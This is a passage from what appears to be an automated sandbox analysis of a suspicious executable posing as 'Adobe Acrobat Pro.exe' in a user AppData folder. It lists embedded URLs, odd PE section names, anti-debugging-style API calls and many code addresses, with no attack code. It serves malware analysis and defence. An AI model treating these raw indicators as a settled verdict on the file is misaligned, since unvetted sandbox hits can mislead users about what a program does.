Pro.exe, 00000008.00000002.2524616562.0000000007611000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007495000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.000000000742C000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.000000000749F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.0000000007437000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.net
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000750A000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007518000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.de
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/?adl=1
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/download.php
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/guides/cxd/how-to-convert-avi-to-dvd.php?adl=1U
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/products.php
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/products/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/products/U
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/redirect.php?site=converters_need_decryptor
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/redirect.php?url=http://oasis.vso-software.fr/Additional%20DVD%20menu%20t
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/secure/auto_update.phpU
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/secure/fast_check.php
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/secure/license_manager.php?m=hello
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/secure/license_manager.php?m=license
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/secure/rlist.php?f=get
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/shop.php
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/support.php
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/support.phpU
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.fr/update/U
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vso-software.frU
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.vso-software.fr/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.vso-software.fr/secure/lm/rsi.php
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.vso-software.fr/vso-partners.php

System Summary

PE file contains section with special chars

Source: avutil.dll.1.dr	Static PE information: section name: .l*m
Source: avutil.dll.1.dr	Static PE information: section name: .)3i
Source: avutil.dll.1.dr	Static PE information: section name: .E k

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CB5F601 NtQueryInformationProcess,	8_2_1CB5F601
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA517E2 NtQuerySystemInformation,	8_2_1CA517E2
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CB06B1B NtDelayExecution,	8_2_1CB06B1B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0570A NtSetInformationThread,	8_2_1CC0570A

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\64d7bc.msi

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIDD98.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD67AB7	8_2_1AD67AB7
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD61BDC	8_2_1AD61BDC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD67F63	8_2_1AD67F63
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD66318	8_2_1AD66318
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD62308	8_2_1AD62308
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD6A036	8_2_1AD6A036
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD6CDEB	8_2_1AD6CDEB
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD62548	8_2_1AD62548
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD66164	8_2_1AD66164
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD6990B	8_2_1AD6990B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD60D2D	8_2_1AD60D2D
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADD791A	8_2_1ADD791A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39AB3E	8_2_1B39AB3E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A7B6C	8_2_1B3A7B6C
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BCBBC	8_2_1B3BCBBC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B394B9F	8_2_1B394B9F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B392B89	8_2_1B392B89
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B396BD2	8_2_1B396BD2
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A6BD6	8_2_1B3A6BD6
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BFA1F	8_2_1B3BFA1F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B399A71	8_2_1B399A71
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A6ABA	8_2_1B3A6ABA
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39EAB8	8_2_1B39EAB8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C399F	8_2_1B3C399F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B49ED	8_2_1B3B49ED
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C59C8	8_2_1B3C59C8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B2814	8_2_1B3B2814
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C285C	8_2_1B3C285C
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B398F04	8_2_1B398F04
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B5F72	8_2_1B3B5F72
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39CF44	8_2_1B39CF44
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B1F44	8_2_1B3B1F44
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A2F85	8_2_1B3A2F85
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A4E37	8_2_1B3A4E37
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AAE1C	8_2_1B3AAE1C
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C5E0C	8_2_1B3C5E0C
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C0E71	8_2_1B3C0E71
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C6E6A	8_2_1B3C6E6A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C4E49	8_2_1B3C4E49
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39DD13	8_2_1B39DD13
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B4D0F	8_2_1B3B4D0F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39AD01	8_2_1B39AD01
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A1D51	8_2_1B3A1D51
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A6DAE	8_2_1B3A6DAE
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B2DF9	8_2_1B3B2DF9
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A9C27	8_2_1B3A9C27
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A0C0E	8_2_1B3A0C0E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3ADC45	8_2_1B3ADC45
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B398CAB	8_2_1B398CAB
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A3CF5	8_2_1B3A3CF5
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B393CE9	8_2_1B393CE9
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BB35A	8_2_1B3BB35A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B22AD	8_2_1B3B22AD
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39C2EB	8_2_1B39C2EB
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B42D8	8_2_1B3B42D8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C312A	8_2_1B3C312A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C812B	8_2_1B3C812B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AD178	8_2_1B3AD178
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BF1DE	8_2_1B3BF1DE
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AA1C9	8_2_1B3AA1C9
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B393076	8_2_1B393076
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A90DE	8_2_1B3A90DE
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A3728	8_2_1B3A3728
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B972F	8_2_1B3B972F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39D75F	8_2_1B39D75F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A07B0	8_2_1B3A07B0
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BD7FC	8_2_1B3BD7FC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3957EC	8_2_1B3957EC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C77EB	8_2_1B3C77EB
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AA7E4	8_2_1B3AA7E4
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3967CA	8_2_1B3967CA
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C37C8	8_2_1B3C37C8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B396632	8_2_1B396632
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BC62F	8_2_1B3BC62F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3CF627	8_2_1B3CF627
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AE607	8_2_1B3AE607
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C6662	8_2_1B3C6662
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AF6BC	8_2_1B3AF6BC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AA69B	8_2_1B3AA69B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BB6DF	8_2_1B3BB6DF
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A66DF	8_2_1B3A66DF
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B392570	8_2_1B392570
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A6575	8_2_1B3A6575
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AA568	8_2_1B3AA568
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AC566	8_2_1B3AC566
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B45B9	8_2_1B3B45B9
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39A5B7	8_2_1B39A5B7
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A85A8	8_2_1B3A85A8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C85C8	8_2_1B3C85C8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A4428	8_2_1B3A4428
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B841E	8_2_1B3B841E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B046A	8_2_1B3B046A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C645A	8_2_1B3C645A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A54AA	8_2_1B3A54AA
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3B24EC	8_2_1B3B24EC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3BF4C4	8_2_1B3BF4C4
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A75EB6B	8_2_1A75EB6B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A7615AD	8_2_1A7615AD
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBF2C8	8_2_1ADBF2C8
